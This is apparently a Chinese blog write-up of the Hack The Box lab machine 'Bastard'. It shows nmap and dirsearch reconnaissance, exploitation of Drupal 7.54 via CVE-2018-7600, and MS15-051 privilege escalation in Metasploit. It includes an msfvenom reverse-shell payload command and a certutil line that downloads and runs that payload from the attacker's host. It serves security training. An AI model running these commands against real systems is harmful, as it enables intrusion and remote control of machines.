HTB靶机 Bastard 渗透测试记录

misaka19008 发布于 2024-11-13 17 次阅读

目标信息

IP地址:10.10.10.9

信息收集

ICMP检测

PING 10.10.10.9 (10.10.10.9) 56(84) bytes of data.
64 bytes from 10.10.10.9: icmp_seq=1 ttl=127 time=169 ms
64 bytes from 10.10.10.9: icmp_seq=2 ttl=127 time=1137 ms
64 bytes from 10.10.10.9: icmp_seq=3 ttl=127 time=168 ms
64 bytes from 10.10.10.9: icmp_seq=4 ttl=127 time=169 ms

--- 10.10.10.9 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3294ms
rtt min/avg/max/mdev = 168.337/410.891/1137.177/419.321 ms, pipe 2

攻击机和靶机之间的通信状态良好。

防火墙检测

# Nmap 7.94SVN scan initiated Fri Sep 20 09:22:04 2024 as: nmap -sF -p- --min-rate 2000 -oN ./fin_result.txt 10.10.10.9
Nmap scan report for 10.10.10.9 (10.10.10.9)
Host is up (0.17s latency).
All 65535 scanned ports on 10.10.10.9 (10.10.10.9) are in ignored states.
Not shown: 65535 open|filtered tcp ports (no-response)

# Nmap done at Fri Sep 20 09:23:11 2024 -- 1 IP address (1 host up) scanned in 66.89 seconds

无法确定靶机防火墙状态,直接进行TCP全端口扫描。

网络端口扫描

TCP端口扫描结果

# Nmap 7.94SVN scan initiated Fri Sep 20 09:30:49 2024 as: nmap -sS -sV -A -p- --min-rate 2000 -oN ./tcp_result.txt 10.10.10.9
Nmap scan report for 10.10.10.9 (10.10.10.9)
Host is up (0.17s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT      STATE SERVICE VERSION
80/tcp    open  http    Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Welcome to Bastard | Bastard
| http-methods: 
|_  Potentially risky methods: TRACE
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-generator: Drupal 7 (http://drupal.org)
135/tcp   open  msrpc   Microsoft Windows RPC
49154/tcp open  msrpc   Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|7|2008|8.1|Vista (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows Embedded Standard 7 (91%), Microsoft Windows 7 or Windows Server 2008 R2 (89%), Microsoft Windows Server 2008 R2 (89%), Microsoft Windows Server 2008 R2 or Windows 8.1 (89%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (89%), Microsoft Windows 7 (89%), Microsoft Windows 7 Professional or Windows 8 (89%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   169.89 ms 10.10.14.1 (10.10.14.1)
2   169.86 ms 10.10.10.9 (10.10.10.9)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Sep 20 09:33:17 2024 -- 1 IP address (1 host up) scanned in 147.90 seconds

UDP端口开放列表扫描结果

# Nmap 7.94SVN scan initiated Fri Sep 20 09:37:48 2024 as: nmap -sU -p- --min-rate 2000 -oN ./udp_ports.txt 10.10.10.9
Nmap scan report for 10.10.10.9 (10.10.10.9)
Host is up (0.17s latency).
All 65535 scanned ports on 10.10.10.9 (10.10.10.9) are in ignored states.
Not shown: 65535 open|filtered udp ports (no-response)

# Nmap done at Fri Sep 20 09:38:55 2024 -- 1 IP address (1 host up) scanned in 67.18 seconds

UDP端口详细信息扫描结果

(无)

同时发现靶机操作系统大致为Windows 8

服务探测

Web应用程序(80端口)

打开主页:http://bastard.htb/

发现网站使用了Drupal 7内容管理系统框架。访问robots.txt

尝试将该文件的内容整理为目录字典,进行目录扫描,结果如下:

# Dirsearch started Sat Sep 21 09:09:04 2024 as: /usr/lib/python3/dist-packages/dirsearch/dirsearch.py -u http://bastard.htb/ -x 400,403,404 -e php,js,html,txt,zip,tar.gz,pcap -t 60 -w ./robots.lst

301   150B   http://bastard.htb/modules    -> REDIRECTS TO: http://bastard.htb/modules/
301   150B   http://bastard.htb/scripts    -> REDIRECTS TO: http://bastard.htb/scripts/
301   151B   http://bastard.htb/includes    -> REDIRECTS TO: http://bastard.htb/includes/
301   149B   http://bastard.htb/themes    -> REDIRECTS TO: http://bastard.htb/themes/
301   147B   http://bastard.htb/misc    -> REDIRECTS TO: http://bastard.htb/misc/
200     2KB  http://bastard.htb/INSTALL.mysql.txt
200     2KB  http://bastard.htb/INSTALL.pgsql.txt
301   151B   http://bastard.htb/profiles    -> REDIRECTS TO: http://bastard.htb/profiles/
200     1KB  http://bastard.htb/INSTALL.sqlite.txt
200    10KB  http://bastard.htb/UPGRADE.txt
200     9KB  http://bastard.htb/MAINTAINERS.txt
200    18KB  http://bastard.htb/LICENSE.txt
200    18KB  http://bastard.htb/INSTALL.txt
200    42B   http://bastard.htb/xmlrpc.php
200     7KB  http://bastard.htb/user/password
200   108KB  http://bastard.htb/CHANGELOG.txt
200     3KB  http://bastard.htb/install.php
200     8KB  http://bastard.htb/?q=user/register
200    13KB  http://bastard.htb/?q=filter/tips
200     7KB  http://bastard.htb/user/login
200     8KB  http://bastard.htb/user/register
200     7KB  http://bastard.htb/?q=user/password
200     7KB  http://bastard.htb/?q=user/login
200     8KB  http://bastard.htb/?q=comment/reply
200    13KB  http://bastard.htb/filter/tips

尝试查看CHANGELOG.txt,发现Drupal的版本为v7.54,直接查找符合条件的漏洞:

Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code - CVE-2018-7602
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution - CVE-2018-7600
Drupal 7.x Module Services - Remote Code Execution - EDBID-41564

发现了3个可用的漏洞。

渗透测试

对发现的3个漏洞进行逐一尝试,发现CVE-2018-7600攻击成功:

直接生成反弹Shell程序:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.2 LPORT=443 -f exe -o ./reverse.exe

随后直接打开Metasploit本地监听,并使用如下Windows CMD命令下载并启动木马程序:

certutil -urlcache -split -f http://10.10.14.2/reverse.exe C:inetpubdrupal-7.54reverse.exe
.reverse.exe

成功!!!

权限提升

内核漏洞探测

收到Shell后,使用post/multi/recon/local_exploit_suggester模块对靶机内核漏洞进行检查,发现有12个漏洞模块可用:

决定直接使用MS15-051漏洞进行提权。

MS15-051漏洞利用

直接加载Metasploit模块exploit/windows/local/ms15_051_client_copy_image,并设置Session ID为当前会话ID

set SESSION 4
set LHOST 10.10.14.2
set LPORT 4444
run

直接执行run命令攻击:

提权成功!!!!

Flag文件展示

本次靶机渗透到此结束

  • wechat_img
此作者没有提供个人介绍
最后更新于 2024-11-13
啥也没有呀